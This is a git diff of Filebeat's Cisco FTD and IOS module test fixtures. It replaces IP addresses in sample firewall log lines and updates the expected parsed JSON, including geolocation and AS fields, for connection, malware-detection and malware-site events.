 2019-08-15T16:05:33Z firepower  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity
-2019-08-15T16:05:37Z firepower  %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address
-2019-08-15T16:07:00Z firepower  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395
+2019-08-15T16:05:37Z firepower  %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address
+2019-08-15T16:07:00Z firepower  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395
 2019-08-15T16:07:18Z firepower  %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
 2019-08-15T16:07:19Z firepower  %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb
 2019-08-16T09:33:15Z firepower  %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity
diff --git a/x-pack/filebeat/module/cisco/ftd/test/security-connection.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/security-connection.log-expected.json
index f5c9eb57649a..5433746ab11c 100644
--- a/x-pack/filebeat/module/cisco/ftd/test/security-connection.log-expected.json
+++ b/x-pack/filebeat/module/cisco/ftd/test/security-connection.log-expected.json
@@ -200,7 +200,7 @@
         "cisco.ftd.security.client": "DNS client",
         "cisco.ftd.security.dns_query": "eu-central-1.ec2.archive.ubuntu.com",
         "cisco.ftd.security.dns_record_type": "a host address",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -217,16 +217,17 @@
         "cisco.ftd.security.src_port": "50074",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 0,
         "destination.port": 53,
         "dns.question.name": "eu-central-1.ec2.archive.ubuntu.com",
@@ -240,7 +241,7 @@
         "event.dataset": "cisco.ftd",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address",
+        "event.original": "%FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address",
         "event.outcome": "success",
         "event.severity": 1,
         "event.timezone": "-02:00",
@@ -255,7 +256,7 @@
         "log.level": "alert",
         "log.offset": 1182,
         "network.application": "dns client",
-        "network.community_id": "1:LrHhMjRxI8XLokucnZO43cq3wJ0=",
+        "network.community_id": "1:vG+yeohmfIAPUJBMid1qX88PX0U=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -272,7 +273,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -308,7 +309,7 @@
         "cisco.ftd.security.dns_record_type": "a host address",
         "cisco.ftd.security.dns_response_type": "Non-Existent Domain",
         "cisco.ftd.security.dns_ttl": "86395",
-        "cisco.ftd.security.dst_ip": "8.8.8.8",
+        "cisco.ftd.security.dst_ip": "175.16.199.1",
         "cisco.ftd.security.dst_port": "53",
         "cisco.ftd.security.egress_interface": "outside",
         "cisco.ftd.security.egress_zone": "output-zone",
@@ -325,16 +326,17 @@
         "cisco.ftd.security.src_port": "49264",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 314,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.packets": 2,
         "destination.port": 53,
         "dns.question.name": "siem-inside",
@@ -350,7 +352,7 @@
         "event.end": "2019-08-15T14:07:00.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395",
+        "event.original": "%FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 175.16.199.1, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395",
         "event.outcome": "success",
         "event.severity": 1,
         "event.start": "2019-08-15T16:07:00.000Z",
@@ -364,9 +366,9 @@
         "host.hostname": "firepower",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 1821,
+        "log.offset": 1826,
         "network.application": "dns client",
-        "network.community_id": "1:/cLFaau3XcCC0NUtxHnt+rWlO6A=",
+        "network.community_id": "1:xUJpK1OSTEvN8EZ/CQ5OoIXiid4=",
         "network.iana_number": 17,
         "network.protocol": "dns",
         "network.transport": "udp",
@@ -383,7 +385,7 @@
         ],
         "related.ip": [
             "10.0.1.20",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "No Authentication Required"
@@ -430,17 +432,7 @@
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
         "destination.address": "52.59.244.233",
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 74,
-        "destination.geo.city_name": "Frankfurt am Main",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 50.1188,
-        "destination.geo.location.lon": 8.6843,
-        "destination.geo.region_iso_code": "DE-HE",
-        "destination.geo.region_name": "Hesse",
         "destination.ip": "52.59.244.233",
         "destination.packets": 1,
         "destination.port": 80,
@@ -465,7 +457,7 @@
         "host.hostname": "firepower",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 2515,
+        "log.offset": 2525,
         "network.community_id": "1:L+Ul/KflTuC9qM1HyJ2hOk2/NSM=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -538,17 +530,7 @@
         "cisco.ftd.security.web_application": "Ubuntu",
         "cisco.ftd.source_interface": "inside",
         "destination.address": "52.59.244.233",
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
         "destination.bytes": 41319018,
-        "destination.geo.city_name": "Frankfurt am Main",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 50.1188,
-        "destination.geo.location.lon": 8.6843,
-        "destination.geo.region_iso_code": "DE-HE",
-        "destination.geo.region_name": "Hesse",
         "destination.ip": "52.59.244.233",
         "destination.packets": 29001,
         "destination.port": 80,
@@ -577,7 +559,7 @@
         "http.response.status_code": "200",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 3037,
+        "log.offset": 3047,
         "network.application": [
             "advanced packaging tool",
             "ubuntu"
@@ -652,17 +634,7 @@
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.source_interface": "inside",
         "destination.address": "213.211.198.62",
-        "destination.as.number": 43341,
-        "destination.as.organization.name": "MDlink online service center GmbH",
         "destination.bytes": 74,
-        "destination.geo.city_name": "Magdeburg",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 52.1333,
-        "destination.geo.location.lon": 11.6167,
-        "destination.geo.region_iso_code": "DE-ST",
-        "destination.geo.region_name": "Saxony-Anhalt",
         "destination.ip": "213.211.198.62",
         "destination.packets": 1,
         "destination.port": 80,
@@ -687,7 +659,7 @@
         "host.hostname": "firepower",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 3919,
+        "log.offset": 3929,
         "network.community_id": "1:TE/czajXLfyOntGRUMlWpOamN+I=",
         "network.iana_number": 6,
         "network.transport": "tcp",
@@ -759,17 +731,7 @@
         "cisco.ftd.security.user_agent": "curl/7.58.0",
         "cisco.ftd.source_interface": "inside",
         "destination.address": "213.211.198.62",
-        "destination.as.number": 43341,
-        "destination.as.organization.name": "MDlink online service center GmbH",
         "destination.bytes": 690,
-        "destination.geo.city_name": "Magdeburg",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 52.1333,
-        "destination.geo.location.lon": 11.6167,
-        "destination.geo.region_iso_code": "DE-ST",
-        "destination.geo.region_name": "Saxony-Anhalt",
         "destination.ip": "213.211.198.62",
         "destination.packets": 4,
         "destination.port": 80,
@@ -798,7 +760,7 @@
         "http.response.status_code": "200",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 4442,
+        "log.offset": 4452,
         "network.application": "curl",
         "network.community_id": "1:TE/czajXLfyOntGRUMlWpOamN+I=",
         "network.iana_number": 6,
@@ -894,7 +856,7 @@
         "host.hostname": "firepower",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 5177,
+        "log.offset": 5187,
         "network.community_id": "1:Lc5Ybc+aBSwS/2nqgn+rGxqrgck=",
         "network.iana_number": 1,
         "network.transport": "icmp",
@@ -996,7 +958,7 @@
         "http.response.status_code": "200",
         "input.type": "log",
         "log.level": "alert",
-        "log.offset": 5719,
+        "log.offset": 5729,
         "network.application": "curl",
         "network.community_id": "1:EX7LDhHq0D9ez/OeVOOW5FWakkI=",
         "network.iana_number": 6,
diff --git a/x-pack/filebeat/module/cisco/ftd/test/security-file-malware.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/security-file-malware.log-expected.json
index 3dcdb4f42197..f6c2477ce209 100644
--- a/x-pack/filebeat/module/cisco/ftd/test/security-file-malware.log-expected.json
+++ b/x-pack/filebeat/module/cisco/ftd/test/security-file-malware.log-expected.json
@@ -618,16 +618,6 @@
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.threat_category": "Win.Ransomware.Eicar::95.sbx.tg",
         "destination.address": "213.211.198.62",
-        "destination.as.number": 43341,
-        "destination.as.organization.name": "MDlink online service center GmbH",
-        "destination.geo.city_name": "Magdeburg",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 52.1333,
-        "destination.geo.location.lon": 11.6167,
-        "destination.geo.region_iso_code": "DE-ST",
-        "destination.geo.region_name": "Saxony-Anhalt",
         "destination.ip": "213.211.198.62",
         "destination.port": 80,
         "event.action": "malware-detected",
@@ -810,16 +800,8 @@
         "cisco.ftd.threat_category": "Pdf.Exploit.Pdfka::100.sbx.tg",
         "cisco.ftd.threat_level": "100",
         "destination.address": "18.197.225.123",
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Frankfurt am Main",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 50.1188,
-        "destination.geo.location.lon": 8.6843,
-        "destination.geo.region_iso_code": "DE-HE",
-        "destination.geo.region_name": "Hesse",
+        "destination.as.number": 3,
+        "destination.as.organization.name": "Massachusetts Institute of Technology",
         "destination.ip": "18.197.225.123",
         "destination.port": 80,
         "event.action": "malware-detected",
diff --git a/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log b/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log
index 3caf6780a5c8..1e1c6f2c86d3 100644
--- a/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log
+++ b/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log
@@ -1 +1 @@
-2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico
+2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 89.160.20.112, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico
diff --git a/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log-expected.json
index eeb9024fdc4e..0d16d6601558 100644
--- a/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log-expected.json
+++ b/x-pack/filebeat/module/cisco/ftd/test/security-malware-site.log-expected.json
@@ -32,21 +32,14 @@
         "cisco.ftd.security.responder_bytes": "246",
         "cisco.ftd.security.responder_packets": "4",
         "cisco.ftd.security.sec_int_matching_ip": "Destination",
-        "cisco.ftd.security.src_ip": "3.3.3.3",
+        "cisco.ftd.security.src_ip": "89.160.20.112",
         "cisco.ftd.security.src_port": "65090",
         "cisco.ftd.security.url": "http://bad-malwaresite-grr.info/favicon.ico",
         "cisco.ftd.security.user": "No Authentication Required",
         "cisco.ftd.security.user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36",
         "cisco.ftd.source_interface": "s1p1",
         "destination.address": "2.2.2.2",
-        "destination.as.number": 3215,
-        "destination.as.organization.name": "Orange",
         "destination.bytes": 246,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "FR",
-        "destination.geo.country_name": "France",
-        "destination.geo.location.lat": 48.8582,
-        "destination.geo.location.lon": 2.3387,
         "destination.ip": "2.2.2.2",
         "destination.packets": 4,
         "destination.port": 80,
@@ -60,7 +53,7 @@
         "event.end": "2020-02-29T23:02:36.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico",
+        "event.original": "%NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 89.160.20.112, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico",
         "event.outcome": "success",
         "event.severity": 0,
         "event.start": "2020-03-01T01:02:16.000Z",
@@ -77,7 +70,7 @@
         "log.level": "unknown",
         "log.offset": 0,
         "network.application": "chrome",
-        "network.community_id": "1:IpM6MLWKXk42SgVki5Wy5/6cTfk=",
+        "network.community_id": "1:9UXIl9ZBksJ4Vl2PAzqL6hYL548=",
         "network.iana_number": 6,
         "network.protocol": "http",
         "network.transport": "tcp",
@@ -95,23 +88,25 @@
         ],
         "related.ip": [
             "2.2.2.2",
-            "3.3.3.3"
+            "89.160.20.112"
         ],
         "related.user": [
             "No Authentication Required"
         ],
         "service.type": "cisco",
-        "source.address": "3.3.3.3",
+        "source.address": "89.160.20.112",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
         "source.bytes": 729,
-        "source.geo.city_name": "Seattle",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 47.6348,
-        "source.geo.location.lon": -122.3451,
-        "source.geo.region_iso_code": "US-WA",
-        "source.geo.region_name": "Washington",
-        "source.ip": "3.3.3.3",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "source.packets": 4,
         "source.port": 65090,
         "tags": [
diff --git a/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log b/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log
index fe309a798a5c..4fa9262cec7f 100644
--- a/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log
+++ b/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log
@@ -22,8 +22,8 @@ Jun 20 02:42:58 198.51.100.2 1663319: Jun 20 02:42:57.340: %SEC-6-IPACCESSLOGP:
 Jun 20 02:43:04 198.51.100.2 1663320: Jun 20 02:43:03.346: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(58393) -> 198.51.100.255(15600), 1 packet
 Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -> 172.217.10.46(80), 1 packet
 Jun 20 02:43:16 198.51.100.2 1663322: Jun 20 02:43:15.350: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(60908) -> 198.51.100.255(15600), 1 packet
-Jun 20 02:43:20 198.51.100.2 1663323: Jun 20 02:43:20.346: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(59415) -> 8.8.8.8(53), 1 packet
-Jun 20 02:43:22 198.51.100.2 1663324: Jun 20 02:43:21.348: %SEC-6-IPACCESSLOGP: list 177 denied udp 8.8.8.8(53) -> 198.51.100.195(59415), 1 packet
+Jun 20 02:43:20 198.51.100.2 1663323: Jun 20 02:43:20.346: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(59415) -> 175.16.199.1(53), 1 packet
+Jun 20 02:43:22 198.51.100.2 1663324: Jun 20 02:43:21.348: %SEC-6-IPACCESSLOGP: list 177 denied udp 175.16.199.1(53) -> 198.51.100.195(59415), 1 packet
 Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets
 Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets
 Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet
diff --git a/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log-expected.json b/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log-expected.json
